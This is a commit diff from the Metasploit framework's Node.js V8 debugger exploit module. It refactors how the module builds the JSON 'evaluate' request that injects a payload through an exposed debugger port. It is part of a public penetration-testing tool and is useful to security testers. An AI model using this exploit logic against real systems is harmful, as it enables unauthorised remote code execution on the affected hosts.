Accept @shawizard suggestion for formatting msg_body

rapid7 · Sep 10, 2017 · 2966fb7 · 2966fb7
1 parent 5d009c8
commit 2966fb7
Showing 1 changed file with 8 additions and 3 deletions.
diff --git a/modules/exploits/multi/misc/nodejs_v8_debugger.rb b/modules/exploits/multi/misc/nodejs_v8_debugger.rb
@@ -9,7 +9,6 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Tcp
 
   MESSAGE_HEADER_TEMPLATE   = "Content-Length: %{length}\r\n\r\n"
-  MESSAGE_TEMPLATE          = '{"seq":1,"type":"request","command":"evaluate","arguments":{"expression":"%{payload}","global":true,"maxStringLength":-1}}'
 
   def initialize(info={})
     super(update_info(info,
@@ -44,8 +43,14 @@ def initialize(info={})
   end
 
   def make_eval_message
-    escaped_payload = payload.encoded.gsub(/"/, '\\"')
-    msg_body = MESSAGE_TEMPLATE % {:payload => escaped_payload}
+    msg_body = { seq: 1,
+                 type: 'request',
+                 command: 'evaluate',
+                 arguments: { expression: payload.encoded,
+                              global: true,
+                              maxStringLength:-1
+                            }
+                }.to_json
     msg_header = MESSAGE_HEADER_TEMPLATE % {:length => msg_body.length}
     msg_header + msg_body
   end